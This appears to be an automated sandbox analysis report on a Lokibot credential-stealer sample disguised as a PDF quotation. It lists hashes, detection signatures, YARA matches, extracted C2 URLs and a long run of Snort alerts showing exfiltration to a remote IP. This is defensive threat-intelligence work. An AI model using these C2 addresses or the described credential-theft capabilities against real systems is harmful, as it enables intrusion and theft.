Loading ...

Play interactive tourEdit tour

Windows Analysis Report Cotizaci#U00f3npdf.exe

Overview

General Information

Sample Name:Cotizaci#U00f3npdf.exe
Analysis ID:553335
MD5:3fe29e21698212a70e03144bb4979632
SHA1:b400de247096542b778aa7ed7584f6829b5bbf4e
SHA256:c42005e0a00c3ecbaff6c1189ca8b6f1298a818878ceaebb623585c399c8ba81
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Cotizaci#U00f3npdf.exe (PID: 2604 cmdline: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" MD5: 3FE29E21698212A70E03144BB4979632)
    • Cotizaci#U00f3npdf.exe (PID: 2512 cmdline: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" MD5: 3FE29E21698212A70E03144BB4979632)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.0.Cotizaci#U00f3npdf.exe.400000.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13e78:$s1: http://
        • 0x17633:$s1: http://
        • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13e80:$s2: https://
        • 0x13e78:$f1: http://
        • 0x17633:$f1: http://
        • 0x13e80:$f2: https://
        1.0.Cotizaci#U00f3npdf.exe.400000.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.0.Cotizaci#U00f3npdf.exe.400000.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            1.0.Cotizaci#U00f3npdf.exe.400000.3.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.0.Cotizaci#U00f3npdf.exe.400000.3.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              Click to see the 82 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Cotizaci#U00f3npdf.exeVirustotal: Detection: 25%Perma Link
              Antivirus detection for URL or domainShow sources
              Source: http://slimpackage.com/slimmain/five/fre.phpAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URLShow sources
              Source: slimpackage.comVirustotal: Detection: 7%Perma Link
              Source: http://slimpackage.com/slimmain/five/fre.phpVirustotal: Detection: 8%Perma Link
              Machine Learning detection for sampleShow sources
              Source: Cotizaci#U00f3npdf.exeJoe Sandbox ML: detected
              Source: 1.0.Cotizaci#U00f3npdf.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
              Source: Cotizaci#U00f3npdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Binary string: wntdll.pdbUGP source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00402630 FindFirstFileA,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49754 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49755 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49799 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49799 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49799 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49806 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49806 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49806 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49812 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49812 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49812 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49813 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49813 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49813 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49814 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49814 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49814 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49815 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49815 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49815 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49818 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49818 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49818 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49819 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49819 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49819 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49820 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49820 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49820 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49821 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49821 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49821 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49827 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49827 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49827 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49828 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49828 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49828 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49830 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49830 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49830 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49831 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49831 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49831 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49832 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49832 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49832 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49836 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49836 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49836 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49837 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49837 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49837 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49838 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49838 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49838 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49839 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49839 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49839 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49840 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49840 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49840 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49844 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49844 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49844 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49848 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49848 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49848 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49850 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49850 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49850 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49851 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49851 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49851 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49853 -> 104.223.93.105:80
